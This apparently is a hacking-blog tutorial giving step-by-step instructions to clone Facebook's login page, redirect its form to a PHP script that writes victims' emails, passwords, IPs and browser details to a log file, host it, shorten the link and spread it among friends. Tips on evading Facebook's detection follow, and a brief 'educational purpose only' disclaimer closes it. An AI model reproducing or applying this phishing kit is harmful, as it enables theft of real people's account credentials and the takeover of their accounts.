PHISHING refers to stealing confidential data mainly username password from someone by sharing Fake website link which appears to be genuine but collects data and reports to hacker. The main targets are Social Media , Financial orgs.
- In a new browser tab open https://www.facebook.com/
- Right Click anywhere in blank and click
View Source/ Open Source
- Copy all by
- Paste in a blank new notepad file and save it as
- Now in same Notepad Window press Ctrl+F , and find action=”https://www. facebook. com/ login.php? login_attempt=1″
- Replace everything between “…….’ like action=”https://www. facebook. com/ login.php? login_attempt=1″ becomes action=”login.php“
- Now again save this file as Index.html.
- Now create a new notepad file.
- Copy the below PHP code to that as it is, – This will give you username, password, IP-Address, Browser Victim is using
$ip = $_SERVER['REMOTE_ADDR'];
$ua = $_SERVER['HTTP_USER_AGENT'];
file_put_contents("logs.html","Email: <b>$email</b> | Password: <b>$pass</b> | IP: <b>$ip</b> | User_Agent: <b>$ua</b> <br> n",FILE_APPEND);
- Save this as login.php.
- Now save a blank notepad file in same location and name it logs.html
- Now Select all the Files with the auto save Facebook folder you saved in step 1, ZIP them .
- Next Step involves registering account with any free web-host or if you have any paid hosting like Dedicated Server which wont block you from hosting phishing although it is illegal.
- Upload All the files in root of public_html. Or the folder of your choice and extract them.
- The folder location you extract to is the address of you phishing website.
- Now Copy your website Link and use any URL Shortner like goo.gl or bit.ly or others to short your URL.
- Distribute Shortned URL in Friends and Make it Viral or make your friends Open it anyhow.
- Check your hosting for logs after they open it.
- Get the password and username.
- Done. Happy Hacking !!
NOTE: If you face the problem in uploading comment or contact, i will write that .
- Saving Facebook page and Editing is easy but is very easily detected, so try writing code for a page that is similar but yet tempting to victim.
- Don;’t use login.php, use some uncommon name.
- You could upgrade your php script to include details like IP-address time and more
- replacing all links on your fake login page to your local hosting would be great as Facebook monitors redirects.
- In the header file try not to load Facebook from it and instead redirect to some blank page or custom page because Facebook warns user often if they are coming from a page not redirected by Facebook.
- CEH v10 : Certified Ethical Hacker v10 PDFs, Tools, LAB Manual Download – UNLOCKED
- VPN HUB : Free & Unlimited Fast Speeds Online Freedom
- Metasploit’s Meterpreter Command Cheat Sheet
- Time Based Blind SQL Injection on MYSQL : How To Do Manually
- Boolean Based Blind SQL Injection on MySQL : How to Do Manually
NOTE: Any such practice as above is illegal, leads to imprisonment. Only For Educational Purpose.